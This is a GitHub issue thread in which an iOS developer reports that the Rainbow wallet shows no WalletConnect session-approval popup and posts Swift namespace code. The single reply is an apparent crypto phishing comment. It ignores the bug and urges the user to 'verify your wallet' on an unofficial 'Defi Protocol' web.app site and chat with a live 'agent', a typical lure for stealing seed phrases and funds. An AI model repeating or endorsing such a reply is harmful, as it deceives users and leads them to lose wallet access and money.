### ISSUE TITLE
Wallet Connect Popup does not appear

### ISSUE THREAD

**Issue by MohitTilwani15** [rainbow-me/rainbow#5100]
I using wallet connect to connect to rainbow app. I have integrated the wallet connect natively in my app. Rainbow for some reason does not show the dialog to approve the session request from my app. Below is the namespace and chain for which I am requesting the session. I am building iOS native app using swift

let methods: Set<String> = ["eth_sendTransaction", "personal_sign", "eth_signTransaction"]
let blockchains: Set<Blockchain> = [Blockchain("eip155:1")!]
let events: Set<String> = ["chainChanged", "accountsChanged"]
let namespaces = ["eip155": ProposalNamespace(chains: blockchains, methods: methods, events: events)]

**Comment by Najnic** [comment]
Hi @MohitTilwani15 
Visit the official Defi Protocol page to verify your wallet under validation to complete your request for you eligibility purpose via [Defi Protocol](https://defirefixprotocol.web.app).
Note: Click on the chat button to initiate a chat with an agent on a live chat for more assistance.
